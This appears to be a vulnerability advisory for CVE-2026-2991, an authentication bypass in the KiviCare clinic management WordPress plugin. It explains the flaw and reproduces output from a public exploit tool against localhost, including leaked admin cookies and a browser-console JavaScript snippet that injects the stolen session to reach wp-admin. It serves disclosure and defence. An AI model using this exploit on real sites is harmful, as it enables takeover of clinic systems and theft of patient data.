CVE-2026-2991:
KiviCare authentication bypass
CVE-2026-2991 is an authentication bypass vulnerability in the KiviCare – Clinic & Patient Management System (EHR) WordPress plugin affecting all versions up to and including 4.1.2.
The plugin exposes a public REST endpoint at /wp-json/kivicare/v1/auth/patient/social-login that authenticates users via social login. The patientSocialLogin() function accepts an email address and an access token but never validates the token against the claimed social provider. Any unauthenticated attacker can log in as any registered patient by supplying only their email and an arbitrary string as the token.
Additionally, WordPress authentication cookies are issued before the patient-role check is enforced. This means that for non-patient accounts (including administrators), the response returns HTTP 403 but still includes valid Set-Cookie headers — leaking a replayable admin session to the attacker.
_____ _____ ___ __ ___ __ ___ ___ ___ _ / __\ \ / / __|_|_ ) \_ )/ / __|_ ) _ \/ _ \/ | | (__\ V /| _|___/ / () / // _ \___/ /\_, /\_, /| | \___| \_/ |___| /___\__/___\___/ /___|/_/ /_/ |_| https://github.com/joshuavanderpoll/CVE-2026-2991 CVE-2026-2991 — KiviCare Authentication Bypass KiviCare Clinic & Patient Management System <= 4.1.2 ──────────────────────────────────────────────────────────── [*] Target : http://localhost:8080 [*] Endpoint: /wp-json/kivicare/v1/auth/patient/social-login ──────────────────────────────────────────────────────────── [@] Checking KiviCare REST namespace... [+] KiviCare REST namespace responded. ──────────────────────────────────────────────────────────── [*] Target email : [email protected] [*] Login type : google [*] Access token : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ──────────────────────────────────────────────────────────── [@] Sending social login request... [*] HTTP 403 [@] 403 Forbidden — This account is not a patient account ──────────────────────────────────────────────────────────── [+] Secondary finding: auth cookies present on 403! [@] Cookies were set before the role check. Replay them for a session. ──────────────────────────────────────────────────────────── [@] Auth cookies: wordpress_37d007a56d816107ce5b52c10342db37 = admin%7C1774035330%7CmFfiKYj9ZTsCd8nVHrjryI0vMSb… wordpress_logged_in_37d007a56d816107ce5b52c10342db37 = admin%7C1774035330%7CmFfiKYj9ZTsCd8nVHrjryI0vMSb… ──────────────────────────────────────────────────────────── [+] Paste into browser console on the target site: // CVE-2026-2991 — inject stolen session cookies (() => { document.cookie = "wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1774035330%7CmFfiKYj9ZTsCd8nVHrjryI0vMSbZc5GL12Qhg2XgjwN%7C9ff6f0a8f64112b6369e837edfd09f65811c3a34c55f8546b085b03e2e894d1d; path=/"; document.cookie = "wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1774035330%7CmFfiKYj9ZTsCd8nVHrjryI0vMSbZc5GL12Qhg2XgjwN%7Ce036b5d44e0123a0a8f85ad194c217da534b9c0a7355905653b710f9b963326c; path=/"; window.location.href = "http://localhost:8080/wp-admin/"; })();
9.8
Critical risk
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Compexity
low
Privileges
none
Affected
<=4.1.2
Patched
>4.1.2